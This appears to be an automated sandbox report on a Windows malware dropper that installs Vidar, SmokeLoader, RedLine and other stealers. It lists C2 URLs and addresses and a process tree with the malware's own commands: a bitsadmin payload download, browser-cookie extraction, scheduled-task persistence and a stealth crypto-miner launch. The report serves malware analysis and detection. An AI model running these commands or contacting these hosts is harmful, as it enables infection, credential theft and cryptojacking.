Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    122s
  • max time network
    1811s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-08-2021 23:12

General

  • Target

    8 (16).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 11 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:596
    • C:\Users\Admin\AppData\Roaming\ehiedtr
      C:\Users\Admin\AppData\Roaming\ehiedtr
      2⤵
        PID:5780
      • C:\Users\Admin\AppData\Roaming\iuiedtr
        C:\Users\Admin\AppData\Roaming\iuiedtr
        2⤵
          PID:6156
        • C:\Users\Admin\AppData\Roaming\iuiedtr
          C:\Users\Admin\AppData\Roaming\iuiedtr
          2⤵
            PID:7076
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1204
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2788
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2708
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                  PID:2696
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2476
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                      PID:2424
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                      1⤵
                        PID:1852
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                        1⤵
                          PID:1404
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                          1⤵
                            PID:1212
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1076
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                              1⤵
                                PID:68
                              • C:\Users\Admin\AppData\Local\Temp\8 (16).exe
                                "C:\Users\Admin\AppData\Local\Temp\8 (16).exe"
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:628
                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:768
                                  • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\setup_install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\setup_install.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:3768
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2100
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_2.exe
                                        sonia_2.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: MapViewOfSection
                                        PID:3452
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3704
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_3.exe
                                        sonia_3.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:788
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 904
                                          6⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4660
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2060
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_1.exe
                                        sonia_1.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:2188
                                        • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_1.exe" -a
                                          6⤵
                                          • Executes dropped EXE
                                          PID:1320
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1540
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_4.exe
                                        sonia_4.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3952
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1508
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_5.exe
                                        sonia_5.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:3964
                                        • C:\Users\Admin\Documents\Ktjxk0GfFK4_kPkdMO9qzZ1x.exe
                                          "C:\Users\Admin\Documents\Ktjxk0GfFK4_kPkdMO9qzZ1x.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4900
                                          • C:\Users\Admin\Documents\Ktjxk0GfFK4_kPkdMO9qzZ1x.exe
                                            C:\Users\Admin\Documents\Ktjxk0GfFK4_kPkdMO9qzZ1x.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4644
                                        • C:\Users\Admin\Documents\pxVF1QAva2eWr_FWPQu_7spT.exe
                                          "C:\Users\Admin\Documents\pxVF1QAva2eWr_FWPQu_7spT.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4892
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 660
                                            7⤵
                                            • Program crash
                                            PID:4940
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 676
                                            7⤵
                                            • Program crash
                                            PID:4496
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 632
                                            7⤵
                                            • Program crash
                                            PID:916
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 676
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Program crash
                                            PID:5072
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1132
                                            7⤵
                                            • Program crash
                                            PID:1740
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1124
                                            7⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:2976
                                        • C:\Users\Admin\Documents\o5SLusH0VfJoABd2j9LBkud2.exe
                                          "C:\Users\Admin\Documents\o5SLusH0VfJoABd2j9LBkud2.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4880
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4488
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:5336
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:672
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:7644
                                              • C:\Users\Admin\Documents\N8P8moIjFT4Wrv8e4KHZvcso.exe
                                                "C:\Users\Admin\Documents\N8P8moIjFT4Wrv8e4KHZvcso.exe"
                                                6⤵
                                                  PID:4868
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "N8P8moIjFT4Wrv8e4KHZvcso.exe" /f & erase "C:\Users\Admin\Documents\N8P8moIjFT4Wrv8e4KHZvcso.exe" & exit
                                                    7⤵
                                                      PID:3252
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "N8P8moIjFT4Wrv8e4KHZvcso.exe" /f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:1500
                                                  • C:\Users\Admin\Documents\WiINSJ6DtwBJ2PURB1uslzVu.exe
                                                    "C:\Users\Admin\Documents\WiINSJ6DtwBJ2PURB1uslzVu.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4856
                                                    • C:\Users\Admin\AppData\Local\Temp\0bmebrih.ozq.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\0bmebrih.ozq.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4700
                                                      • C:\Users\Admin\AppData\Roaming\HashModule.exe
                                                        "C:\Users\Admin\AppData\Roaming\HashModule.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5912
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                          9⤵
                                                            PID:5136
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                              10⤵
                                                              • Creates scheduled task(s)
                                                              PID:2412
                                                          • C:\Users\Admin\AppData\Roaming\Internalprosecc.exe
                                                            "C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"
                                                            9⤵
                                                              PID:6420
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                                10⤵
                                                                  PID:6460
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                    11⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:6636
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                  10⤵
                                                                    PID:6612
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6031730 --pass=nixwaree --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                                                                    10⤵
                                                                      PID:6556
                                                                • C:\Users\Admin\AppData\Roaming\Intilizate.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Intilizate.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Adds Run key to start application
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:6092
                                                                • C:\Users\Admin\AppData\Roaming\AkrienPremium.exe
                                                                  "C:\Users\Admin\AppData\Roaming\AkrienPremium.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5160
                                                                • C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:5152
                                                                • C:\Users\Admin\AppData\Roaming\WindowsInternal.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5128
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"' & exit
                                                                    9⤵
                                                                      PID:1324
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"'
                                                                        10⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:5144
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      PID:5656
                                                                  • C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe
                                                                    "C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe"
                                                                    8⤵
                                                                    • Modifies WinLogon for persistence
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:6140
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fLgKTryf3c.bat"
                                                                      9⤵
                                                                        PID:4376
                                                                        • C:\Windows\system32\chcp.com
                                                                          chcp 65001
                                                                          10⤵
                                                                            PID:5840
                                                                          • C:\Windows\system32\w32tm.exe
                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                            10⤵
                                                                              PID:6220
                                                                            • C:\Users\Admin\AppData\Roaming\7544615\4229675.exe
                                                                              "C:\Users\Admin\AppData\Roaming\7544615\4229675.exe"
                                                                              10⤵
                                                                                PID:7192
                                                                      • C:\Users\Admin\Documents\0CJgh98fklnp7KjQMsYsG6cX.exe
                                                                        "C:\Users\Admin\Documents\0CJgh98fklnp7KjQMsYsG6cX.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:5000
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          7⤵
                                                                            PID:5968
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Kills process with taskkill
                                                                              PID:5744
                                                                        • C:\Users\Admin\Documents\skvKxncqIwJ3oBTgWHlrShhb.exe
                                                                          "C:\Users\Admin\Documents\skvKxncqIwJ3oBTgWHlrShhb.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4988
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:5744
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5336
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5648
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:6432
                                                                            • C:\Users\Admin\Documents\5_yIuW36WR7x7xxnl0o7wRm6.exe
                                                                              "C:\Users\Admin\Documents\5_yIuW36WR7x7xxnl0o7wRm6.exe"
                                                                              6⤵
                                                                                PID:5072
                                                                                • C:\Users\Admin\Documents\5_yIuW36WR7x7xxnl0o7wRm6.exe
                                                                                  "C:\Users\Admin\Documents\5_yIuW36WR7x7xxnl0o7wRm6.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:4760
                                                                              • C:\Users\Admin\Documents\SVRjQnGHzuQLboKzfmsAlkP4.exe
                                                                                "C:\Users\Admin\Documents\SVRjQnGHzuQLboKzfmsAlkP4.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:5064
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 268
                                                                                  7⤵
                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                  • Program crash
                                                                                  PID:4828
                                                                              • C:\Users\Admin\Documents\bxviVKuRdZtEThvZEBxn9C2g.exe
                                                                                "C:\Users\Admin\Documents\bxviVKuRdZtEThvZEBxn9C2g.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:4156
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:4048
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:6800
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:1480
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:6968
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            8⤵
                                                                                              PID:4048
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:7144
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:2268
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyC026.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:6312
                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                  "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                  7⤵
                                                                                                  • Download via BitsAdmin
                                                                                                  PID:5136
                                                                                              • C:\Users\Admin\Documents\ptz_R_N5THtGaf8tAvIub1J5.exe
                                                                                                "C:\Users\Admin\Documents\ptz_R_N5THtGaf8tAvIub1J5.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4120
                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                                  7⤵
                                                                                                    PID:4932
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Continua.pptx
                                                                                                    7⤵
                                                                                                      PID:1612
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd
                                                                                                        8⤵
                                                                                                          PID:4324
                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                            findstr /V /R "^hrVmJwToKxUzJbufzBCieeoCYvJHZAdLamrEFkwMUIyxRybgpVUzcLJlUzAjsjoltowlzBJiAQhzXOKSZcbrGWfHQSKjKOxHAVdJthUHjMSFbfhyIHhWOtDiSxxBRbbMcF$" Palpito.pptx
                                                                                                            9⤵
                                                                                                              PID:4344
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                              Dir.exe.com p
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5372
